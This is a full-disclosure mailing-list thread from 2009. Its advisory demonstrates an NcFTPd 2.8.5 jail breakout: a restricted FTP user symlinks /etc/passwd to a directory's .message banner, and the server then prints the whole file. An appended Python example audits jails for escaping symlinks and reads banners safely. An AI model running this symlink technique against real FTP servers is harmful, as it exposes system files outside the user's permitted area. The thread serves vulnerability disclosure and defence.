Date: Mon, 27 Jul 2009 15:55:22 -0400
From: Jeremy Brown <0xjbrown41@...il.com>
To: Kingcope <kcope2@...glemail.com>, full-disclosure@...ts.grok.org.uk
Subject: Re: NcFTPd <= 2.8.5 remote jail breakout

You seem to be very forgetful lately kcope! But it is ok, because your
research is always interesting. We forgive you :)

On Mon, Jul 27, 2009 at 3:50 PM, Kingcope<kcope2@...glemail.com> wrote:
> Hello list.
> Just to clarify the NcFTPd vulnerability affects all operating systems
> that NcFTPd runs on,
> not just FreeBSD.
>
> Cheers,
>
> kcope
>
>
>
> 2009/7/27 Kingcope <kcope2@...glemail.com>:
>> NcFTPd <= 2.8.5 remote jail breakout
>>
>> Discovered by:
>>        Kingcope
>>        Contact: kcope2<at>googlemail.com / http://isowarez.de
>>
>> Date:
>>        27th July 2009
>>
>> Greetings:
>>        Alex,Andi,Adize,wY!,Netspy,Revoguard
>>
>> Prerequisites:
>>        Valid user account.
>>
>> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>>
>> # ftp 192.168.2.5
>> Connected to 192.168.2.5.
>> 220 localhost NcFTPd Server (unregistered copy) ready.
>> Name (192.168.2.5:root): kcope
>> 331 User kcope okay, need password.
>> Password:
>> 230-You are user #1 of 50 simultaneous users allowed.
>> 230-
>> 230 Restricted user logged in.
>> Remote system type is UNIX.
>> Using binary mode to transfer files.
>> ftp> get /etc/passwd passwd
>> local: passwd remote: /etc/passwd
>> 502 Unimplemented command.
>> 227 Entering Passive Mode (192,168,2,5,219,171)
>> 550 No such file.
>> ftp> ls ..
>> 227 Entering Passive Mode (192,168,2,5,218,102)
>> 553 Permission denied.
>> ftp> mkdir isowarez
>> 257 "/isowarez" directory created.
>> ftp> quote site symlink /etc/passwd isowarez/.message
>> 250 Symlinked.
>> ftp> cd isowarez
>> 250-"/isowarez" is new cwd.
>> 250-
>> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
>> 250-#
>> 250-root:*:0:0:Charlie &:/root:/bin/sh
>> 250-toor:*:0:0:Bourne-again Superuser:/root:
>> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
>> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
>> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
>> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
>> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
>> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
>> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
>> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
>> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
>> 250-smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
>> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
>> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
>> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
>> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
>> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
>> 250-uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
>> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
>> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
>> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
>> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
>> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
>> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
>> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
>> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
>> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
>> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
>> 250-test:*:1003:1003:test:/home/test:/bin/sh
>> 250-+testx:*:::::/bin/sh
>> 250
>> ftp>
>>
>> +on FreeBSD you can symlink directories like '/'
>>
>> Cheerio,
>>
>> Kingcope
>>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
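
The session quoted above shows a directory banner file (`.message`) being read through a symlink that points outside the restricted user's root. The following is an added example, not part of the thread and not NcFTPd code: an audit helper that lists symlinks under a jail root whose targets resolve outside it, and a banner reader that refuses to follow a symlink. The function names, the directory layout and the sample files are assumptions constructed for the demonstration, and a POSIX system is assumed.

```python
import os
import stat
import tempfile

def escaping_symlinks(jail_root):
    """Return sorted jail-relative paths of symlinks that resolve outside jail_root."""
    root = os.path.realpath(jail_root)
    found = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:  # directory symlinks show up in dirnames
            path = os.path.join(dirpath, name)
            if os.path.islink(path) and os.path.commonpath([root, os.path.realpath(path)]) != root:
                found.append(os.path.relpath(path, root))
    return sorted(found)

def read_banner(jail_root, directory, name=".message", limit=4096):
    """Return banner text, or None if it is missing, a symlink, or not a regular file."""
    root = os.path.realpath(jail_root)
    dirpath = os.path.realpath(os.path.join(root, directory))
    if os.path.commonpath([root, dirpath]) != root:
        return None  # the directory itself resolves outside the jail
    try:  # O_NOFOLLOW makes open() fail when the final component is a symlink
        fd = os.open(os.path.join(dirpath, name), os.O_RDONLY | os.O_NOFOLLOW | os.O_NONBLOCK)
    except OSError:
        return None
    with os.fdopen(fd, "rb") as fh:
        if not stat.S_ISREG(os.fstat(fh.fileno()).st_mode):
            return None  # refuse FIFOs, devices and directories
        return fh.read(limit).decode("utf-8", "replace")

def demo():
    """Build a constructed jail in a temp dir and run both checks against it."""
    with tempfile.TemporaryDirectory() as tmp:
        jail = os.path.join(tmp, "home", "user")  # hypothetical jail root
        os.makedirs(os.path.join(jail, "isowarez"))
        os.makedirs(os.path.join(jail, "pub"))
        secret = os.path.join(tmp, "passwd")  # stands in for a file outside the jail
        with open(secret, "w") as f:
            f.write("root:*:0:0\n")
        with open(os.path.join(jail, "pub", ".message"), "w") as f:
            f.write("Welcome\n")
        os.symlink(secret, os.path.join(jail, "isowarez", ".message"))
        os.symlink(tmp, os.path.join(jail, "up"))  # directory symlink leaving the jail
        return escaping_symlinks(jail), read_banner(jail, "isowarez"), read_banner(jail, "pub")

if __name__ == "__main__":
    print(demo())
```

The containment check on the directory and the later `open()` are separate steps, so a server that handles concurrent sessions would resolve each path component relative to an already-open directory descriptor instead.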
